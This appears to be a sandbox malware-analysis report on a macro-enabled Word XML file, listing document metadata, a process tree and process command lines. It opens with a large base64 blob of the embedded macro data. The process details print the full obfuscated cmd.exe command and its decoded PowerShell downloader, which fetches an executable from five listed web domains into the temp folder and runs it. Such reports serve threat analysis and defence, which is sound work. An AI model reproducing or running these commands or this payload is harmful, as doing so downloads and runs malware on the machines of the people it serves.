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
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:23 06:29:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:23 06:29:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
15
Malicious processes
6
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs findstr.exe no specs cmd.exe no specs powershell.exe 784.exe no specs 784.exe wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
3376"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
3048"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\asdfasdf.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2452c:\m4308\n1983\c4441\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3072CmD /V:ON/C"set wJ=Ic$Fy%H72nT)x-4f:G D(CbM5igoUdjv;VLhW18}Km'w=r\.S06Np@9E/salOAPBu{,t~k+e3&&for %J in (52;27;43;5;62;28;63;34;0;21;16;68;24;66;37;5;45;5;48;55;48;48;0;60;51;51;61;23;55;16;68;13;14;66;37;5;35;5;10;55;23;62;16;68;13;72;66;37;5;59;59;18;2;29;7;24;38;37;44;42;22;37;72;7;14;42;32;2;52;38;24;54;38;44;9;71;43;13;27;22;30;71;1;67;18;51;71;67;47;36;71;22;21;59;25;71;9;67;32;2;64;38;49;54;38;44;42;35;67;67;52;16;56;56;71;45;29;71;41;22;64;59;64;67;47;1;27;41;56;67;45;55;33;19;58;17;53;35;67;67;52;16;56;56;22;58;25;30;25;9;15;71;9;47;1;27;41;56;50;23;71;8;59;10;6;48;45;43;53;35;67;67;52;16;56;56;15;58;67;41;58;9;64;45;67;58;57;69;71;57;71;9;47;1;27;41;56;49;19;24;40;63;15;14;17;69;53;35;67;67;52;16;56;56;52;58;69;57;27;4;41;64;35;71;9;29;25;57;59;25;69;47;1;27;41;56;52;29;29;48;19;57;63;57;3;53;35;67;67;52;16;56;56;22;27;27;67;58;59;4;47;1;27;41;56;3;71;12;24;67;7;15;71;42;47;48;52;59;25;67;20;42;53;42;11;32;2;58;14;50;14;54;44;42;9;72;8;8;24;42;32;2;45;7;72;8;8;18;44;18;42;7;38;14;42;32;2;43;37;50;37;44;42;64;72;8;50;37;42;32;2;69;14;72;37;50;44;2;71;9;31;16;67;71;41;52;70;42;46;42;70;2;45;7;72;8;8;70;42;47;71;12;71;42;32;15;27;45;71;58;1;35;20;2;64;37;50;37;50;18;25;9;18;2;64;38;49;54;38;11;65;67;45;4;65;2;52;38;24;54;38;47;19;27;43;9;59;27;58;29;3;25;59;71;20;2;64;37;50;37;50;66;18;2;69;14;72;37;50;11;32;2;31;8;8;38;49;44;42;31;54;50;7;7;42;32;0;15;18;20;20;17;71;67;13;0;67;71;41;18;2;69;14;72;37;50;11;47;59;71;9;26;67;35;18;13;26;71;18;14;49;49;49;49;11;18;65;0;9;31;27;69;71;13;0;67;71;41;18;2;69;14;72;37;50;32;2;27;54;50;14;49;44;42;27;24;7;49;54;42;32;22;45;71;58;69;32;39;39;1;58;67;1;35;65;39;39;2;52;7;72;72;54;44;42;35;24;7;54;38;42;32;81)do set Oe=!Oe!!wJ:~%J,1!&&if %J==81 echo !Oe:*Oe!=!|FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^^^|findstr cm')DO %B "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2672C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d7581='b1374';$p8598=new-object Net.WebClient;$u8098='http://erdembulut.com/trEVDaG@http://baijinfen.com/6Me2lTHSrw@http://fatmanurtaskesen.com/0D5KBf4Gk@http://paksoymuhendislik.com/pddSDsBsF@http://bootaly.com/Fex5t7fe'.Split('@');$a4649='n3225';$r7322 = '784';$w161='u3261';$k4316=$env:temp+'\'+$r7322+'.exe';foreach($u1616 in $u8098){try{$p8598.DownloadFile($u1616, $k4316);$v2280='v9677';If ((Get-Item $k4316).length -ge 40000) {Invoke-Item $k4316;$o9640='o5709';break;}}catch{}}$p7339='h5798';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2752C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=RfvH0 tokens=1" %B IN ('ftype^|findstr cm') DO %B "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3204C:\Windows\system32\cmd.exe /c ftype|findstr cmC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
